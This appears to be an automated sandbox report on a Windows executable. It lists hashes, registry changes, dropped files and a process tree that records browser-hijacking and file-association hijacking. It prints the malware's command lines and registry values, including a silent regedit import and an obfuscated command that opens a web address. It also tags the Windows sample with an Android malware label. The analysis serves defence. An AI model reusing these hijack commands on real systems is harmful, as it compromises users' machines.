Analysis

max time kernel: 152s
max time network: 174s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-09-2022 08:10

Behavioral task: behavioral1
Sample: 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Resource: win7-20220812-en

Behavioral task: behavioral2
Sample: 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Resource: win10v2004-20220812-en

General

Target: 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Size: 31KB
MD5: d19fb816ef890f60e3540b406e7c3bf5
SHA1: 6a359982daceb160e73334341e70d83e3796c421
SHA256: 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8
SHA512: c0ab0c0c8d1280e335576c38f86769b120e8368494f3369c1def895fbda7b29e26c59f90cd36d6c25a8070830c8debff9ffc18fece89a6eac614a9ac75ec8d69
SSDEEP: 768:kocmTDD19oLGzXhvhLdXUi6ZBasRoxUMg:vPz5h9xRuBb2xUMg
Malware Config

Signatures

joker
Joker is Android malware that targets billing and SMS fraud.

resource | yara_rule
behavioral2/memory/4340-132-0x0000000000400000-0x0000000000429000-memory.dmp | upx
behavioral2/memory/4340-145-0x0000000000400000-0x0000000000429000-memory.dmp | upx
behavioral2/memory/4340-147-0x0000000000400000-0x0000000000429000-memory.dmp | upx
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.

description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops file in Program Files directory (1 IoCs)

description | ioc | Process
File created | C:\Program Files\Common Files\tk.reg | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Drops file in Windows directory (5 IoCs)

description | ioc | Process
File opened for modification | C:\Windows\My.ini | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification | C:\Windows\inf\yewnsemla.wzyxk | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File created | C:\Windows\inf\1_yewnsemla.wzyxk | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification | C:\Windows\inf\pack.wsf | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification | C:\Windows\inf\yewnsemla.wzyxk | Cmd.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies Internet Explorer settings

description | ioc | Process
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.5136688.com\ = "126" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "756" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3080748286" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm" | WScript.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "189" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "504" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985263" | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | WScript.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "693" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370360775" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "630" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985263" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm" | WScript.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "252" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "693" | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "63" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "252" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a10000000000200000000001066000000010000200000008908c2f3f1bc248b339e4f43869cd7f4e6268fd9c40950bcd143b96e689e4753000000000e8000000002000020000000b608be236d7cfa026cc484b332ab99c49e544b45f90ded96c0152faa52342fb3200000008e0194ec8fc1c8f9bbcbbd6d5843892e9a03fe302b57049fe28b189464ad5e2e40000000d9ef91b54bc029858370bfddff91e7d6131133c06a239f875cc70f56c6f41ec20991ccb93db2edcd608933722a0f28f5b16626ef68e8a0cde08c394125833658 | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\NumberOfSubdomains = "1" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "63" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "504" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "441" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "567" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985263" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.5136688.com | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "63" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "126" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "252" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985263" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3131373645" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "189" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "504" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.5136688.com\ = "63" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\5136688.com\Total = "63" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "126" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "315" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "567" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv | IEXPLORE.EXE
Modifies Internet Explorer start page (1 TTPs, 1 IoCs)

description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm" | WScript.exe
Modifies registry class (64 IoCs)

description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1 h%t%t%p:%//%w%w%w.%15%11%13%16%16%18%18.%c%o%m/?8" | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler | WScript.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command\ = "WScript.exe \"C:\\Windows\\inf\\yewnsemla.wzyxk\" \"%1\"" | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\Command\ = "C:\\Windows\\SysWow64\\CScript.exe \"%1\" %*" | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript" | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command\ = "WScript.exe \"C:\\Windows\\inf\\yewnsemla.wzyxk\" \"%1\"" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\ | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\DefaultIcon | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.qc\ = "qcfile" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" | WScript.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\FriendlyTypeName = "@%SystemRoot%\\System32\\wshext.dll,-4804" | regedit.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer" | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\IconHandler | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511" | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" | regedit.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O) | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2 | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0" | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex | WScript.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.wzyxk | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command | WScript.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID | WScript.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)" | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "????" | regedit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode | regedit.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\ | regedit.exe
Runs .reg file with regedit (1 IoCs)

pid | Process
4644 | regedit.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)

pid | Process
1860 | iexplore.exe

Suspicious use of FindShellTrayWindow (2 IoCs)

pid | Process
1860 | iexplore.exe
1860 | iexplore.exe

Suspicious use of SetWindowsHookEx (11 IoCs)

pid | Process
4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
1860 | iexplore.exe
1860 | iexplore.exe
2632 | IEXPLORE.EXE
2632 | IEXPLORE.EXE
1860 | iexplore.exe
1860 | iexplore.exe
5080 | IEXPLORE.EXE
5080 | IEXPLORE.EXE
5080 | IEXPLORE.EXE
5080 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory (28 IoCs)

description | pid | Process | procid_target
PID 4340 wrote to memory of 2220 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 80
PID 4340 wrote to memory of 2220 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 80
PID 4340 wrote to memory of 2220 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 80
PID 2220 wrote to memory of 4644 | 2220 | cmd.exe | 82
PID 2220 wrote to memory of 4644 | 2220 | cmd.exe | 82
PID 2220 wrote to memory of 4644 | 2220 | cmd.exe | 82
PID 4340 wrote to memory of 4264 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 84
PID 4340 wrote to memory of 4264 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 84
PID 4340 wrote to memory of 4264 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 84
PID 4264 wrote to memory of 3060 | 4264 | Cmd.exe | 86
PID 4264 wrote to memory of 3060 | 4264 | Cmd.exe | 86
PID 4264 wrote to memory of 3060 | 4264 | Cmd.exe | 86
PID 4340 wrote to memory of 4840 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 87
PID 4340 wrote to memory of 4840 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 87
PID 4340 wrote to memory of 4840 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 87
PID 4840 wrote to memory of 1860 | 4840 | WScript.exe | 88
PID 4840 wrote to memory of 1860 | 4840 | WScript.exe | 88
PID 1860 wrote to memory of 2632 | 1860 | iexplore.exe | 90
PID 1860 wrote to memory of 2632 | 1860 | iexplore.exe | 90
PID 1860 wrote to memory of 2632 | 1860 | iexplore.exe | 90
PID 4340 wrote to memory of 3692 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 94
PID 4340 wrote to memory of 3692 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 94
PID 4340 wrote to memory of 2804 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 95
PID 4340 wrote to memory of 2804 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 95
PID 4340 wrote to memory of 2804 | 4340 | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe | 95
PID 1860 wrote to memory of 5080 | 1860 | iexplore.exe | 96
PID 1860 wrote to memory of 5080 | 1860 | iexplore.exe | 96
PID 1860 wrote to memory of 5080 | 1860 | iexplore.exe | 96
Processes

(indentation shows parent/child depth in the process tree; first line of each entry is the image path, second line the command line)

C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
"C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe"
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 4340

    C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
    - Suspicious use of WriteProcessMemory
    PID: 2220

        C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Program Files\Common Files\tk.reg"
        - Modifies registry class
